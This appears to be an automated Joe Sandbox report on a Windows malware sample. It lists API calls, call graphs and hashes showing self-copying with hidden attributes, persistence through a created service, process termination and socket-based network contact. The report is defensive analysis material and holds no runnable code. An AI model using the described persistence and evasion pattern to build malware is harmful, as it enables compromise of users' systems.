11088->11106 11089->11073 11091 a4349c 11090->11091 11091->11106 11110 a61190 11091->11110 11093 a435d4 11095 a3ad30 4 API calls 11093->11095 11094 a435e7 11097 a42c90 4 API calls 11094->11097 11099 a435e2 11095->11099 11097->11099 11101 a42c90 4 API calls 11099->11101 11100->11093 11100->11094 11100->11106 11102 a4363c 11101->11102 11103 a53a80 4 API calls 11102->11103 11102->11106 11104 a43750 11103->11104 11105 a42c90 4 API calls 11104->11105 11104->11106 11108 a43813 11105->11108 11106->11079 11106->11083 11107 a53a80 4 API calls 11107->11108 11108->11106 11108->11107 11109 a42c90 4 API calls 11108->11109 11109->11108 11111 a611d8 11110->11111 11112 a53a80 4 API calls 11111->11112 11113 a434da 11111->11113 11112->11113 11113->11106 11114 a3ad30 11113->11114 11115 a3ad45 11114->11115 11122 a4f160 11115->11122 11117 a3ae1f 11117->11100 11118 a50790 4 API calls 11119 a3ad8b 11118->11119 11119->11117 11119->11118 11121 a3ade7 11119->11121 11120 a5ab60 4 API calls 11120->11121 11121->11117 11121->11120 11124 a4f1b5 11122->11124 11123 a4f1bc 11123->11119 11124->11123 11125 a4f322 11124->11125 11126 a4f27a 11124->11126 11128 a42c90 4 API calls 11125->11128 11127 a4f2bb 11126->11127 11129 a58b60 4 API calls 11126->11129 11130 a4f2f8 11127->11130 11132 a42c90 4 API calls 11127->11132 11156 a4f2eb 11127->11156 11131 a4f392 11128->11131 11129->11127 11130->11119 11134 a42c90 4 API calls 11131->11134 11131->11156 11132->11156 11133 a31170 2 API calls 11135 a50425 11133->11135 11136 a4f3d9 11134->11136 11135->11119 11137 a53a80 4 API calls 11136->11137 11136->11156 11138 a4f440 11137->11138 11139 a58b60 4 API calls 11138->11139 11138->11156 11140 a4f461 11139->11140 11141 a53a80 4 API calls 11140->11141 11140->11156 11142 a4f485 11141->11142 11143 a53a80 4 API calls 11142->11143 11142->11156 11144 a4f4a7 11143->11144 11145 a61190 4 API calls 11144->11145 11147 a4f5fa 11144->11147 11144->11156 11146 a4f5a0 11145->11146 11149 a61190 4 API calls 11146->11149 11146->11156 11148 a61190 4 API calls 11147->11148 11147->11156 11152 a4f6df 11148->11152 11149->11147 11150 a5ab60 4 API calls 11150->11152 11151 a5024a 11153 a42c90 4 API calls 11151->11153 11154 a50299 11151->11154 11152->11150 11159 a4f7e0 11152->11159 11153->11154 11155 a42c90 4 API calls 11154->11155 11154->11156 11155->11156 11156->11130 11156->11133 11157 a48bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11157->11159 11158 a58b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11158->11159 11159->11151 11159->11156 11159->11157 11159->11158 11160 a5ab60 4 API calls 11159->11160 11161 a42c90 4 API calls 11159->11161 11162 a61190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11159->11162 11163 a50790 4 API calls 11159->11163 11160->11159 11161->11159 11162->11159 11163->11159 11165 a323ad 11164->11165 11166 a4d990 8 API calls 11165->11166 11167 a323f2 ReadFile 11166->11167 11168 a32452 11167->11168 11169 a324c1 WaitForSingleObject 11167->11169 11168->11169 11170 a44290 8 API calls 11168->11170 11169->11003 11169->11004 11171 a3247e ReadFile 11170->11171 11171->11168 11171->11169 11172->10854 11173->10852 11174->10856 11176 a31e0f 11175->11176 11178 a31e37 11175->11178 11177 a608b0 GetSystemTimeAsFileTime 11176->11177 11177->11178 11178->10941 11180 a3c152 11179->11180 11181 a32f90 2 API calls 11180->11181 11182 a3c193 11181->11182 11183 a4a810 9 API calls 11182->11183 11184 a3c1d1 11183->11184 11185 a41bb0 2 API calls 11184->11185 11186 a3c205 11185->11186 11187 a3c218 11186->11187 11188 a32f90 2 API calls 11186->11188 11187->10941 11189 a3c245 11188->11189 11190 a4a810 9 API calls 11189->11190 11191 a3c29b 11190->11191 11192 a41bb0 2 API calls 11191->11192 11193 a3c2f8 11192->11193 11193->10941 11295 a5b3c0 11296 a42a80 8 API calls 11295->11296 11297 a5b3d9 11296->11297 11298 a61050 8 API calls 11297->11298 11299 a5b42e 11298->11299 10572 a328d0 10573 a328e7 10572->10573 10574 a32903 10572->10574 10575 a32935 10574->10575 10576 a32a46 ReadFile 10574->10576 10577 a32a61 10576->10577 10578 a32cd0 10583 a41cc0 10578->10583 10590 a5b450 10583->10590 10591 a5b46a 10590->10591 10592 a600f0 8 API calls 10591->10592 10593 a5b49b 10592->10593 10594 a4fcd7 10599 a4f850 10594->10599 10595 a58b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10595->10599 10596 a50368 10597 a31170 2 API calls 10596->10597 10598 a50425 10597->10598 10599->10595 10599->10596 10600 a48bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10599->10600 10601 a61190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10599->10601 10603 a42c90 4 API calls 10599->10603 10604 a5024a 10599->10604 10607 a50790 4 API calls 10599->10607 10609 a5ab60 10599->10609 10600->10599 10601->10599 10603->10599 10605 a42c90 4 API calls 10604->10605 10606 a50299 10604->10606 10605->10606 10606->10596 10608 a42c90 4 API calls 10606->10608 10607->10599 10608->10596 10610 a5ab77 10609->10610 10611 a5ad05 10610->10611 10612 a5abea 10610->10612 10613 a3a850 4 API calls 10611->10613 10614 a5ac6c 10612->10614 10615 a5ac0c 10612->10615 10618 a5ac21 10613->10618 10617 a4d9a0 4 API calls 10614->10617 10616 a4d9a0 4 API calls 10615->10616 10616->10618 10617->10618 10618->10599 10619 a3fed0 10620 a3feeb 10619->10620 10621 a3bb70 8 API calls 10620->10621 10622 a3ff10 10621->10622 10625 a53080 10622->10625 10626 a5308e 10625->10626 10627 a44290 8 API calls 10626->10627 10628 a3ff27 10627->10628 11300 a3f9d0 11301 a3f9e6 11300->11301 11304 a53c50 11301->11304 11303 a3fa49 11305 a53c6f 11304->11305 11306 a3e320 8 API calls 11305->11306 11307 a53c86 11306->11307 11307->11303 10629 a50ad0 10632 a3b780 10629->10632 10635 a4d750 10632->10635 10636 a4d77e 10635->10636 10637 a4d75a 10635->10637 10638 a42eb0 2 API calls 10637->10638 10638->10636 11454 a64f5c 11456 a64e97 11454->11456 11455 a64f77 11456->11454 11456->11455 11458 a37a04 132 API calls 11456->11458 11457 a64ec9 11458->11457 11308 a50fd8 11309 a50fe0 11308->11309 11406 a3d500 lstrlen 11309->11406 11311 a5110c 11407 a3d500 lstrlen 11311->11407 11313 a52250 11314 a5111a 11314->11313 11315 a32f90 2 API calls 11314->11315 11316 a51195 11315->11316 11317 a3d530 9 API calls 11316->11317 11318 a511c3 11317->11318 11319 a41bb0 2 API calls 11318->11319 11320 a511d5 11319->11320 11322 a32f90 2 API calls 11320->11322 11336 a5134c 11320->11336 11321 a601a0 9 API calls 11323 a513d8 11321->11323 11324 a51226 11322->11324 11325 a61050 8 API calls 11323->11325 11327 a4a810 9 API calls 11324->11327 11326 a513e4 11325->11326 11328 a32f90 2 API calls 11326->11328 11329 a51258 11327->11329 11330 a51422 11328->11330 11332 a41bb0 2 API calls 11329->11332 11331 a601a0 9 API calls 11330->11331 11333 a5144a 11331->11333 11337 a51288 11332->11337 11334 a61050 8 API calls 11333->11334 11335 a51456 11334->11335 11338 a41bb0 2 API calls 11335->11338 11336->11321 11337->11336 11339 a5b500 8 API calls 11337->11339 11340 a51478 11338->11340 11341 a512fa 11339->11341 11344 a601a0 9 API calls 11340->11344 11342 a32f90 2 API calls 11341->11342 11343 a51310 11342->11343 11345 a3d530 9 API calls 11343->11345 11346 a514e2 11344->11346 11347 a51328 11345->11347 11348 a61050 8 API calls 11346->11348 11349 a41bb0 2 API calls 11347->11349 11350 a514f1 11348->11350 11349->11336 11353 a32f90 2 API calls 11350->11353 11389 a516c2 11350->11389 11351 a32f90 2 API calls 11352 a51702 11351->11352 11354 a601a0 9 API calls 11352->11354 11355 a51595 11353->11355 11356 a51728 11354->11356 11358 a601a0 9 API calls 11355->11358 11357 a61050 8 API calls 11356->11357 11359 a51734 11357->11359 11360 a515d0 11358->11360 11363 a41bb0 2 API calls 11359->11363 11361 a61050 8 API calls 11360->11361 11362 a515df 11361->11362 11366 a32f90 2 API calls 11362->11366 11364 a5174e 11363->11364 11365 a51786 socket 11364->11365 11367 a61050 8 API calls 11364->11367 11368 a517b2 11365->11368 11369 a517de 11365->11369 11370 a51600 11366->11370 11367->11365 11371 a518c4 gethostbyname 11369->11371 11372 a517fb setsockopt 11369->11372 11373 a41bb0 2 API calls 11370->11373 11371->11313 11374 a518ed inet_ntoa inet_addr htons connect 11371->11374 11375 a51866 11372->11375 11376 a51628 11373->11376 11378 a519ca 11374->11378 11382 a519e0 11374->11382 11375->11371 11379 a65820 wvsprintfA 11376->11379 11380 a5165e 11379->11380 11381 a41bb0 2 API calls 11380->11381 11383 a5167a 11381->11383 11384 a51a00 send 11382->11384 11385 a601a0 9 API calls 11383->11385 11388 a51a1e 11384->11388 11386 a516b3 11385->11386 11387 a61050 8 API calls 11386->11387 11387->11389 11390 a4d990 8 API calls 11388->11390 11392 a51a3e 11388->11392 11389->11351 11391 a51add recv 11390->11391 11393 a521ad closesocket 11391->11393 11405 a51b57 11391->11405 11395 a52210 11393->11395 11394 a31df0 GetSystemTimeAsFileTime 11394->11405 11395->11313 11396 a5b500 8 API calls 11395->11396 11396->11313 11397 a40110 8 API calls 11397->11405 11398 a44290 8 API calls 11398->11405 11399 a4a810 9 API calls 11399->11405 11400 a52135 recv 11401 a52187 11400->11401 11400->11405 11401->11393 11402 a41bb0 GetProcessHeap RtlFreeHeap 11402->11405 11403 a3c110 9 API calls 11403->11405 11404 a32f90 GetProcessHeap RtlAllocateHeap 11404->11405 11405->11393 11405->11394 11405->11397 11405->11398 11405->11399 11405->11400 11405->11401 11405->11402 11405->11403 11405->11404 11406->11311 11407->11314

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00A37A04 Relevance: 60.1, APIs: 28, Strings: 5, Instructions: 2326sleepfilesynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00000000,C:\Windows\system32\config\systemprofile,00000104), ref: 00A383DA
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00A38448
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00A384DC
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00A384F7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A38599
                                                                                                                                                                                                              • Part of subcall function 00A45200: GetVersionExA.KERNEL32(00ABAE70), ref: 00A452CC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000D05), ref: 00A38B70
                                                                                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 00A38DAC
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00A38E86
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00A38E9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00A38EC3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 00A3912B
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00A39186
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00A39265
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?), ref: 00A39370
                                                                                                                                                                                                              • Part of subcall function 00A3A4E0: lstrlen.KERNEL32(?), ref: 00A3A4FE
                                                                                                                                                                                                              • Part of subcall function 00A3D500: lstrlen.KERNEL32(?,?,00A3D630,?), ref: 00A3D523
                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 00A396D4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A39AC8
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00A39AEC
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00A39B0C
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 00A39B3B
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00A39C52
                                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 00A38CB2
                                                                                                                                                                                                              • Part of subcall function 00A3BBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A3BC90
                                                                                                                                                                                                              • Part of subcall function 00A3BBC0: Process32First.KERNEL32(00000000,?), ref: 00A3BCE3
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00A386AE
                                                                                                                                                                                                              • Part of subcall function 00A32800: ExitProcess.KERNEL32 ref: 00A32842
                                                                                                                                                                                                              • Part of subcall function 00A608B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A60929
                                                                                                                                                                                                              • Part of subcall function 00A608B0: __aulldiv.LIBCMT ref: 00A60953
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00A39E32
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00A7D800,00000080), ref: 00A39E88
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,00A7D800,00000000), ref: 00A39EA6
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00A7D800,00000002), ref: 00A39EC5
                                                                                                                                                                                                              • Part of subcall function 00A40500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00A40537
                                                                                                                                                                                                              • Part of subcall function 00A40500: CreateServiceA.ADVAPI32(00000000,00F7E6B0,00F7E6B0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A40596
                                                                                                                                                                                                              • Part of subcall function 00A40500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00A40615
                                                                                                                                                                                                              • Part of subcall function 00A40500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00A4062A
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 00A3A26A
                                                                                                                                                                                                            • Sleep.KERNEL32(0000C350), ref: 00A3A327
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$ChangeCloseConfig2CountEnvironmentExitFirstHandleManagerMessageOpenProcessProcess32SnapshotStartSystemThreadTickToolhelp32VariableVersion__aulldiv
                                                                                                                                                                                                            • String ID: zS$%Tmd$C:\Windows\system32\config\systemprofile$@L$}en
                                                                                                                                                                                                            • API String ID: 2964372999-1718768463
                                                                                                                                                                                                            • Opcode ID: 0783e844ac88657a94db2c5da09d83c4cb248c0cca2a7ec78a59e9604986e705
                                                                                                                                                                                                            • Instruction ID: a2a12dc258a8578df2b07ac1a53681734985336260cf234bf1cefaef442085ed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0783e844ac88657a94db2c5da09d83c4cb248c0cca2a7ec78a59e9604986e705
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C230471A00302DFD704EFE4FD8A6663BB4FB95341F11861AE14A962B6EB7448A3CF51
                                                                                                                                                                                                            Function 00A45200 Relevance: 30.9, APIs: 12, Strings: 5, Instructions: 1106fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 493 a45200-a4528c call a60a20 496 a452b2-a45338 GetVersionExA call a3b7a0 call a3fbc0 493->496 497 a4528e-a452ac 493->497 502 a4533e-a45397 call a3f0d0 496->502 503 a45598-a45602 496->503 497->496 509 a45399-a453a5 502->509 510 a453ab-a45405 502->510 505 a45604-a45626 503->505 506 a4562d-a456d0 call a32f90 call a3d530 call a41bb0 call a3d670 call a3def0 call a41d90 503->506 505->506 536 a456d6-a4575b DeleteFileA RemoveDirectoryA 506->536 537 a4575d 506->537 509->510 513 a45407-a45419 510->513 514 a4541f-a45446 call a3c580 510->514 513->514 520 a45496-a454b6 CreateDirectoryA call a32f90 514->520 521 a45448-a45482 514->521 525 a454bb-a4554d call a3c580 call a41bb0 520->525 521->520 522 a45484-a45490 521->522 522->520 525->506 535 a45553-a45564 525->535 538 a45575-a45593 535->538 539 a45566-a45570 535->539 540 a45760-a457c9 call a3f0d0 536->540 537->540 538->506 539->506 543 a4580c-a45883 call a3c580 CreateDirectoryA call a313e0 540->543 544 a457cb-a457e0 540->544 551 a45885-a458a3 543->551 552 a458ad-a45915 call a3e430 CreateDirectoryA 543->552 545 a45802 544->545 546 a457e2-a45800 544->546 545->543 546->543 551->552 555 a45917 552->555 556 a45921-a45964 call a32f90 552->556 555->556 559 a45966-a45975 556->559 560 a4597b-a459af call a3c580 556->560 559->560 563 a459c5-a459d7 560->563 564 a459b1-a459c3 560->564 565 a459dd-a45a35 call a32f90 call a41bb0 563->565 564->565 570 a45a37-a45a58 565->570 571 a45a5a-a45a67 565->571 572 a45a6e-a45a8b call a3d530 570->572 571->572 575 a45aa2-a45adc call a41bb0 call a3d670 call a3def0 call a41d90 572->575 576 a45a8d-a45a9b 572->576 585 a464f5-a4650b 575->585 586 a45ae2-a45b01 575->586 576->575 587 a4650d-a46517 585->587 588 a46519-a46537 585->588 589 a45b07-a45b75 call a32f90 call a65820 586->589 590 a45c42-a45cec call a32f90 call a65820 call a41bb0 586->590 591 a4653d-a4657c call a3e430 SetFileAttributesA 587->591 588->591 606 a45b97-a45bd0 call a41bb0 589->606 607 a45b77-a45b90 589->607 613 a45d0e 590->613 614 a45cee-a45d0c 590->614 600 a4659c-a465ce call a5a7e0 call a3e310 591->600 601 a4657e-a46596 591->601 601->600 615 a45bd2-a45be4 606->615 616 a45c1f-a45c3d 606->616 607->606 618 a45d10-a45db5 call a3c580 CreateDirectoryA call a313e0 613->618 614->618 615->618 620 a45bea-a45c1a 615->620 616->618 624 a45db7-a45de6 618->624 625 a45e1c-a45e37 618->625 620->618 626 a45e08-a45e1a 624->626 627 a45de8-a45e06 624->627 628 a45e43-a45ec2 call a3e430 CreateDirectoryA call a32f90 625->628 629 a45e39 625->629 626->628 627->628 634 a45ed4-a45f12 call a3c580 628->634 635 a45ec4-a45ecf 628->635 629->628 638 a45f14-a45f2a 634->638 639 a45f40-a45fa0 call a32f90 call a41bb0 call a3d530 634->639 635->634 638->639 640 a45f2c-a45f39 638->640 647 a45fc7-a46007 call a41bb0 call a3d670 call a3def0 call a41d90 639->647 648 a45fa2-a45fbb 639->648 640->639 658 a464e1-a464ee 647->658 659 a4600d-a4606b GetTempPathA call a3d500 647->659 648->647 649 a45fbd 648->649 649->647 658->585 662 a46071-a4607d 659->662 663 a46169-a461ea call a313e0 call a3e430 659->663 665 a46092-a4609a 662->665 666 a4607f-a4608c 662->666 678 a461f6-a46217 CreateDirectoryA 663->678 679 a461ec 663->679 668 a4609c-a460b4 665->668 669 a460da-a460fe 665->669 666->665 673 a460b6-a460c9 668->673 674 a460d0-a460d3 668->674 670 a46100 669->670 671 a4610a-a4615d 669->671 670->671 671->663 675 a4615f 671->675 673->674 674->662 677 a460d5 674->677 675->663 677->663 680 a46219-a46225 678->680 681 a4622b-a462db call a32f90 call a3c580 call a32f90 678->681 679->678 680->681 688 a462dd-a462ee 681->688 689 a462fa-a46342 call a41bb0 681->689 688->689 690 a462f0 688->690 693 a46344-a46351 689->693 694 a46357-a463ba call a3d530 call a41bb0 call a3d670 call a3def0 call a41d90 689->694 690->689 693->694 705 a464a5-a464db 694->705 706 a463c0-a46441 GetTempPathA call a313e0 call a32f90 694->706 705->658 711 a46455-a4649e call a3c580 call a41bb0 706->711 712 a46443-a4644f 706->712 711->705 712->711
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(00ABAE70), ref: 00A452CC
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 00A4549F
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 00A456FE
                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00000000), ref: 00A45743
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00A4583A
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00A458F3
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00A45D71
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00A45E82
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 00A46029
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00A461FF
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 00A463DE
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000002), ref: 00A4655F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
                                                                                                                                                                                                            • String ID: C:\Windows\system32\config\systemprofile$C:\whfkpbh\$\$aE'P$r9:
                                                                                                                                                                                                            • API String ID: 1691758827-2593203275
                                                                                                                                                                                                            • Opcode ID: 62caa11a9e2060968d82e3a696ad758f0aaf8b43382329be7bca47d1823dbf3c
                                                                                                                                                                                                            • Instruction ID: 2c96d200c69962e61b844d1e3b72e8e099aba07f43bd0043a4d9982b556e2def
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62caa11a9e2060968d82e3a696ad758f0aaf8b43382329be7bca47d1823dbf3c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6A267B6A00202DFC704DFE4FD866B637B0F795310B018629E546962F6EB7488A7CF55
                                                                                                                                                                                                            Function 00A3BBC0 Relevance: 10.7, APIs: 7, Instructions: 205processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 717 a3bbc0-a3bbdf 718 a3bbe1-a3bbff 717->718 719 a3bc05-a3bc60 717->719 718->719 720 a3bc62-a3bc6c 719->720 721 a3bc6e-a3bc86 719->721 722 a3bc8c-a3bcb5 CreateToolhelp32Snapshot 720->722 721->722 723 a3bf47-a3bf86 call a5a7e0 722->723 724 a3bcbb-a3bcff Process32First 722->724 725 a3bd05-a3bd06 724->725 726 a3bf1a-a3bf41 CloseHandle 724->726 728 a3bd10-a3bd56 call a313e0 725->728 726->723 732 a3bd80-a3bdb5 call a3a4e0 call a5b260 728->732 733 a3bd58-a3bd74 728->733 739 a3bdbb-a3bdfc OpenProcess 732->739 740 a3beb9-a3bed1 732->740 733->732 734 a3bd76 733->734 734->732 743 a3bea3-a3beb2 739->743 744 a3be02-a3be48 TerminateProcess 739->744 741 a3bed3 740->741 742 a3bedd-a3bf13 Process32Next 740->742 741->742 742->728 747 a3bf19 742->747 743->740 745 a3be67-a3be89 CloseHandle 744->745 746 a3be4a-a3be61 744->746 745->743 748 a3be8b-a3be9d 745->748 746->745 747->726 748->743
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A3BC90
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 00A3BCE3
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A3BDDD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3397401024-0
                                                                                                                                                                                                            • Opcode ID: 7ff895f26800880b000775b91c1f49ac2e5023c49fe0ddecf5c347cedb1cfaf0
                                                                                                                                                                                                            • Instruction ID: 37c59a9f99e81d822ce26ec8cf89c931651ab7c52b21601042ee485fa495e204
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ff895f26800880b000775b91c1f49ac2e5023c49fe0ddecf5c347cedb1cfaf0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D89123B6A10202CFC704DFE8FC99AAA37B5FB98310F15811AE505972B1DB788997CF54
                                                                                                                                                                                                            Function 00A41530 Relevance: 9.2, APIs: 6, Instructions: 176filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 749 a41530-a4155f 750 a41561-a41579 749->750 751 a4157f-a4160f CreateFileA 749->751 750->751 752 a41637-a4164c 751->752 753 a41611-a41635 751->753 754 a41653-a41655 752->754 753->754 755 a41657-a41672 754->755 756 a41673-a41692 GetFileTime 754->756 757 a41694-a416be CloseHandle 756->757 758 a416bf-a4174b call a65e60 756->758 761 a41771-a417bc GetFileSize CloseHandle 758->761 762 a4174d-a4176b 758->762 763 a417dd-a417ee 761->763 764 a417be-a417dc 761->764 762->761
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A415C3
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00A4168A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A416A7
                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A41715
                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00A41774
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A41792
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
